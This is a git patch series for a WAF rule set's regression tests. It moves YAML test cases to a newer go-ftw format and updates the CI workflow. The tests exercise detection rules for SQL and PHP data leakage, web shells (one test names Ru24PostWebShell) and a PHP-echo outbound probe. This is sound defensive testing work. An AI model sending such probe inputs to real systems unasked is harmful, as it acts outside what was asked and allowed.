[944300] @@ -5232,7 +5160,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5413,7 +5340,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5434,7 +5360,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5455,7 +5380,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5636,7 +5560,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5657,7 +5580,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5678,7 +5600,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5859,7 +5780,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5880,7 +5800,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5901,7 +5820,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6082,7 +6000,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6103,7 +6020,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6124,7 +6040,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6305,7 +6220,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6326,7 +6240,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6347,7 +6260,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6528,7 +6440,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6549,7 +6460,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -6570,7 +6480,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index bb4b5cf06..90685d508 100644 --- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -87,4 +87,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " + log: + match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index 4e4c8ffd5..cf9e40a07 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951110" rule_id: 951110 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index df1498b4e..84bc18f98 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951120" rule_id: 951120 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index 2dee3e9fb..beb26bbef 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951130" rule_id: 951130 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index 1e9af862e..25fcdcf04 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951140" rule_id: 951140 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index ea77b7f80..c92333950 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951160" rule_id: 951160 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index a6ab7eada..85bcf4ac6 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951170" rule_id: 951170 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index ebbb20c6c..57f2cdc95 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951180" rule_id: 951180 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index 24570ba38..d717ef4f3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951190" rule_id: 951190 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index 2a31214ec..ee8a31012 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951200" rule_id: 951200 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index 554fc98ef..28239707b 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951210" rule_id: 951210 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 37d8c78e1..b66b43f98 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit, Xhoenix" - description: "Regression tests for rule 951220" rule_id: 951220 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 7663c5e82..ee66a9da0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit, Xhoenix" - description: "Regression tests for rule 951230" rule_id: 951230 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index 720f5cae0..802915fd3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit, Xhoenix" - description: "Regression tests for rule 951240" rule_id: 951240 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index 321868202..ebc1c439d 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951250" rule_id: 951250 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e1e08b2dc..852a60793 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 951260" rule_id: 951260 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index 3fdccb669..18149c32e 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -1,7 +1,6 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - description: "Tests for rule 953100" rule_id: 953100 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 698ea42ee..abb4ceb62 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -1,7 +1,6 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - description: "Tests for rule 953101" rule_id: 953101 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 4475c5935..ddcfda844 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -1,7 +1,6 @@ --- meta: author: "fzipi, azurit" - description: "Positive tests for rule 953120" rule_id: 953120 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 93c7d327a..fb954c0ef 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrew Howe" - description: "Tests for rule 954100" rule_id: 954100 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index 71366862c..f13c4f303 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -1,7 +1,7 @@ --- meta: author: "Felipe Zipitria, azurit" - description: "Tests for rule 954120 - IIS Error information disclusure" + description: "IIS Error information disclusure" rule_id: 954120 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 7e9c13b50..eb0f78400 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,7 +1,6 @@ --- meta: author: "azurit" - description: "Regression tests for rule 955100" rule_id: 955100 tests: - test_id: 1 diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 699a250f3..4098fec7a 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,7 +1,7 @@ --- meta: author: "azurit" - description: "Regression tests for rule 955260" +rule_id: 955260 tests: - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 08d07373a..1f1dbe8ab 100644 --- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -67,4 +67,5 @@ tests: uri: "/reflect" data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + log: + match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index 44461a0e3..027c14df7 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -69,9 +69,9 @@ tests: uri: "/get" version: "HTTP/1.1" output: - # Phase 5 rules are prone to a race condition when parsing log output. + # Phase 5 rules are prone to a race condition when parsing log output. # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true log: - no_expect_ids: [980170] + no_expect_ids: [980170] diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 07edf93e4..408ddceb9 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton @@ -1,5 +1,4 @@ - - - test_id: 1 + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - input: @@ -17,7 +16,8 @@ version: "HTTP/1.0" data: "test=skeletonkeyword" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" @@ -37,7 +37,8 @@ version: "HTTP/1.0" data: "skeletonkeyword=test" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" @@ -58,7 +59,8 @@ version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" @@ -79,7 +81,8 @@ version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" @@ -100,7 +103,8 @@ version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 6 desc: "XML attribute value includes keyword skeletonkeyword" @@ -120,7 +124,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 7 desc: "XML element value includes keyword skeletonkeyword" @@ -140,7 +145,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 8 desc: "Nested XML element value includes keyword skeletonkeyword" @@ -160,7 +166,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 9 desc: "Content-Type text/plain includes keyword skeletonkeyword" @@ -180,7 +187,8 @@ version: "HTTP/1.0" data: "test=skeletonkeyword" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 10 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" @@ -200,7 +208,8 @@ version: "HTTP/1.0" data: "{\"test\": \"skeletonkeyword\"}" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 11 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" @@ -220,4 +229,5 @@ version: "HTTP/1.0" data: "{\"skeletonkeyword\": \"test\"}" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] diff --git a/tests/regression/tests/positivetest.yaml.skeleton b/tests/regression/tests/positivetest.yaml.skeleton index 181a36af4..4391b960c 100644 --- a/tests/regression/tests/positivetest.yaml.skeleton +++ b/tests/regression/tests/positivetest.yaml.skeleton @@ -16,7 +16,8 @@ version: "HTTP/1.0" data: "test=skeletonkeyword" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" @@ -36,7 +37,8 @@ version: "HTTP/1.0" data: "skeletonkeyword=test" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" @@ -57,7 +59,8 @@ version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" @@ -78,7 +81,8 @@ version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" @@ -99,7 +103,8 @@ version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 6 desc: "XML element includes keyword skeletonkeyword" @@ -119,7 +124,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" output: - no_log_contains: "id \"skeletonid\"" + no_log: + expect_ids: [skeletonid] - test_id: 7 desc: "XML attribute name includes keyword skeletonkeyword" @@ -139,7 +145,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" output: - no_log_contains: "id \"skeletonid\"" + no_log: + expect_ids: [skeletonid] - test_id: 8 desc: "XML attribute value includes keyword skeletonkeyword" @@ -159,7 +166,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 9 desc: "XML element value includes keyword skeletonkeyword" @@ -179,7 +187,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 10 desc: "Nested XML element value includes keyword skeletonkeyword" @@ -199,7 +208,8 @@ version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 11 desc: "Content-Type text/plain includes keyword skeletonkeyword" @@ -219,7 +229,8 @@ version: "HTTP/1.0" data: "test=skeletonkeyword" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 12 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" @@ -239,7 +250,8 @@ version: "HTTP/1.0" data: "{\"test\": \"skeletonkeyword\"}" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 13 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" @@ -259,7 +271,8 @@ version: "HTTP/1.0" data: "{\"skeletonkeyword\": \"test\"}" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" @@ -279,7 +292,8 @@ version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" @@ -299,7 +313,8 @@ version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" @@ -319,7 +334,8 @@ version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" @@ -339,4 +355,5 @@ version: "HTTP/1.0" data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" output: - log_contains: "id \"skeletonid\"" + log: + expect_ids: [skeletonid] From a9e91f8c38a73fa8262d6db207e904fda69dbafb Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Sat, 1 Jun 2024 18:08:46 +0200 Subject: [PATCH 11/18] chore: update workflow for go-ftw v1.0.1 --- .github/workflows/test.yml | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 72c42f930..647427c4b 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '0.6.4' + GO_FTW_VERSION: '1.0.1' jobs: regression: @@ -36,16 +36,22 @@ jobs: -p "ftw_${{ env.GO_FTW_VERSION }}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - name: "Run tests for ${{ matrix.modsec_version }}" - env: - FTW_LOGFILE: './tests/logs/${{ matrix.modsec_version }}/error.log' run: | mkdir -p "tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}" chmod -R o+rw "tests/logs" docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml logs - [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ] + if ! [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ]; then + echo "Web server failed to start. Aborting." + exit 1 + fi + ./ftw check -d tests/regression/tests - ./ftw run -d tests/regression/tests --show-failures-only + ./ftw run \ + -d tests/regression/tests \ + --log-file "tests/logs/${{ matrix.modsec_version }}/error.log" \ + --overrides tests/regression/httpd-overrides.yaml \ + --show-failures-only - name: "Change permissions if failed" if: failure() From a5f47967a2517c0bce776b49429e692dc9f85261 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Fri, 14 Jun 2024 18:21:01 +0200 Subject: [PATCH 12/18] chore: update to go-ftw v1.0.2 --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 647427c4b..f8c201c22 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '1.0.1' + GO_FTW_VERSION: '1.0.2' jobs: regression: From dda2f1a2537a1d37fce6994852105d09814191bf Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Mon, 17 Jun 2024 20:31:04 +0200 Subject: [PATCH 13/18] chore: fix typo --- tests/regression/nginx-overrides.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 1c40df533..d2b1fe98f 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -113,7 +113,7 @@ test_overrides: expect_ids: [920620] - rule_id: 930110 test_ids: [7] - reason: "nginx does not strip the dots from the URL (which http apparently does), hence ModSecurity sees them and the rule matches" + reason: "nginx does not strip the dots from the URL (which httpd apparently does), hence ModSecurity sees them and the rule matches" output: log: expect_ids: [930110] From f9e843a1c6252bbe2136ab50f27ec4a7e1caf64b Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 20 Jun 2024 20:40:17 +0200 Subject: [PATCH 14/18] chore: apply review suggestions --- .../920340.yaml | 2 ++ .../920480.yaml | 12 +++++------ .../933110.yaml | 1 + .../933180.yaml | 20 +++++++++++++++++++ tests/regression/tests/base_positive_rules.py | 2 +- .../tests/positivetest-light.yaml.skeleton | 3 +++ 6 files changed, 33 insertions(+), 7 deletions(-) diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml index 24c669bcf..d4b91f372 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" + description: 920340 should detect requests that have a `Content-Length` header but no `Content-Type` header rule_id: 920340 tests: - test_id: 1 @@ -15,6 +16,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "xy" + method: "POST" autocomplete_headers: false version: "HTTP/1.1" output: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 6999af956..b1ac9650e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -191,7 +191,7 @@ tests: version: "HTTP/1.1" output: log: - no_expect_ids: [920480] + no_expect_ids: [920480] - test_id: 5 stages: - input: @@ -209,7 +209,7 @@ tests: output: log: no_expect_ids: [920480] - # TODO: this case is not yet handled by 3.1, future work + # TODO: this case is not yet handled by 3.1, future work (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 6 # stages: # - input: @@ -260,7 +260,7 @@ tests: output: log: expect_ids: [920480] - # TODO: this test should pass (works with curl), to be researched + # TODO: this test should pass (works with curl), to be researched 